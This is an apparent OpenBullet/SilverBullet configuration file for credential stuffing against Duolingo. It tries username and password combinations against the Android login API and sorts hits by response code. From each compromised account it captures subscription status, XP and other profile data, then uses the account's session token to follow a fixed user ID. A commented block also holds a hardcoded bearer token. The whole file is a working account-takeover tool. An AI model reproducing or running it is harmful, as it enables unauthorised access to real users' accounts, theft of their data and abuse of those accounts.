[SETTINGS]
{
  "Name": "duolingo1",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2023-08-08T13:32:49.0760249+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.3 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "duolingo1",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://android-api-ga.duolingo.com/2017-06-30/login?fields=id" 
  CONTENT "{\"distinctId\":\"6c00a02d-05d3-431c-9800-fffb936a7f92\",\"identifier\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "X-Amzn-Trace-Id: User=0" 
  HEADER "User-Agent: Duodroid/5.98.4 Dalvik/2.1.0 (Linux; U; Android 7.1.2; SM-N975F Build/N2G48H)" 
  HEADER "Accept: application/json" 
  HEADER "Content-Type: application/json" 
  HEADER "Content-Length: 105" 
  HEADER "Host: android-api-ga.duolingo.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 

PARSE "<HEADERS(jwt)>" LR "" "" -> VAR "jwt" 

PARSE "<SOURCE>" LR "{\"id\":" "}" -> VAR "id" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "401" 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" Contains "200" 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" Contains "429" 

FUNCTION ClearCookies 

REQUEST GET "https://www.duolingo.com/2017-06-30/users?email=<USER>&_=1676143376159" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR ",\"hasPlus\":" ",\"" CreateEmpty=FALSE -> CAP "Plus" 

PARSE "<SOURCE>" LR "\"emailVerified\":" ",\"" CreateEmpty=FALSE -> CAP "emailVerified" 

PARSE "<SOURCE>" LR "\"learningLanguage\":\"" "\"," CreateEmpty=FALSE -> CAP "learningLanguage" 

PARSE "<SOURCE>" LR "\"totalXp\":" ",\"" CreateEmpty=FALSE -> CAP "totalXp" 

PARSE "<SOURCE>" LR "\"crowns\":" ",\"" CreateEmpty=FALSE -> CAP "crowns" 

!KEYCHECK 
!  KEYCHAIN Custom "FREE" OR 
!    KEY "hasPlus\":false" 
!  KEYCHAIN Success OR 
!    KEY "hasPlus\":true" 

!REQUEST POST "https://www.duolingo.com/2017-06-30/friends/users/<id>/follow/638925748" 
!  CONTENT "{\"properties\":{\"follow_reason\":\"search\",\"component\":\"profile_header_button\",\"via\":\"add_friends_search\"}}" 
!  CONTENTTYPE "application/x-www-form-urlencoded" 
!  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
!  HEADER "Pragma: no-cache" 
!  HEADER "Accept: */*" 
!  HEADER "Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjYzMDcyMDAwMDAsImlhdCI6MCwic3ViIjoyNzU3NDMzNTV9.Ypn1kNb_7oOmsAtW1COe78bDFmYGPNfJ5Yg5ALOZUlQ" 

REQUEST POST "https://android-api.duolingo.cn/2017-06-30/friends/users/<id>/follow/638925748" 
  CONTENT "{\"properties\":{\"follow_reason\":\"search\",\"component\":\"profile_header_button\",\"via\":\"add_friends_search\"}}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <jwt>" 

